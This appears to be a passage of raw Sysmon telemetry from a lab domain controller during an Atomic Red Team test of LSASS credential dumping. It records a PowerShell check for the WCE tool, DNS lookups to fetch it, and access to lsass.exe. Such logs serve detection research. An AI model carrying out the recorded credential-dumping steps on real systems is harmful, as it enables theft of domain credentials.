21:09:49.318{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024747Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.318{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024746Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.318{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024745Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.318{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000024744Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.331{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000024792Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:50.745{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B72052055E4E452979A1D4E5115D54EC,SHA256=F5710E5342E1B0ED969CA1F8F5EC2F01509FC90A9BD824870DE84D91482351D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024791Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:50.729{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FDB71816182E375E6B0AB8A92253D474,SHA256=43F42ABE4F3D52CD9DAC1D0AB9F8ABC7EF90487C8BE6E4C43214DA807E697474,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024790Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:50.432{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=ABF4F6DCD83A55E8AFDA735BA6B66E00,SHA256=91CDB4033540A25B15FE1B30EAC6B6AC35E3E546E48D0CEABBD3BAF48477ED8A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024789Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.232{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61520-false10.0.1.12-8000- 11241100x800000000000000024798Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:51.964{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003.001\bin\wce\LICENSE.txt2021-06-23 21:09:51.964 22542200x800000000000000024797Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:50.302{4DB9351A-A31D-60D3-2A06-00000000CF01}5208www.ampliasecurity.com0type: 5 ampliasecurity.com;::ffff:155.133.130.34;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x800000000000000024796Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:50.014{4DB9351A-A31D-60D3-2A06-00000000CF01}5208raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000024795Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:51.902{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9EDD4C4C5521919334781C47667BD02,SHA256=17728DCCF66612519A86200A40800490620F7979FEB96919AACC3B5AE5DEB0C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024794Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:51.589{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=659B8B59DACA0A0A8D6106DFFA447D60,SHA256=71729F28007314CA957E419002818E17B4DC6279DA46EEF05CC3F2A0562BDDB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024793Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:51.589{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=0DCB1AB34BE391E57B4D853C563FE72D,SHA256=6F8ECE9325A6C1DF0D57A5FB1877A1B870D2DD1C692C3F9AC1CD43DA0D2F6D4D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024872Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.964{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A320-60D3-2E06-00000000CF01}6452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024871Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.964{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024870Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.964{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024869Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.964{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024868Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.964{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024867Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.964{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A320-60D3-2E06-00000000CF01}6452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024866Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.964{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A320-60D3-2E06-00000000CF01}6452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024865Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.967{4DB9351A-A320-60D3-2E06-00000000CF01}6452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000024864Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.964{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024863Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.964{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024862Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.917{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024861Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.917{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000024860Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:09:52.885{4DB9351A-A320-60D3-2D06-00000000CF01}5160\PSHost.132689561928234603.5160.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000024859Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.870{4DB9351A-A320-60D3-2D06-00000000CF01}5160ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ajz5i1vk.qd4.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024858Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.870{4DB9351A-A320-60D3-2D06-00000000CF01}5160ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_m4dji2li.1de.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024857Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.870{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_m4dji2li.1de.ps12021-06-23 21:09:52.870 10341000x800000000000000024856Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.854{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024855Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.823{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024854Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 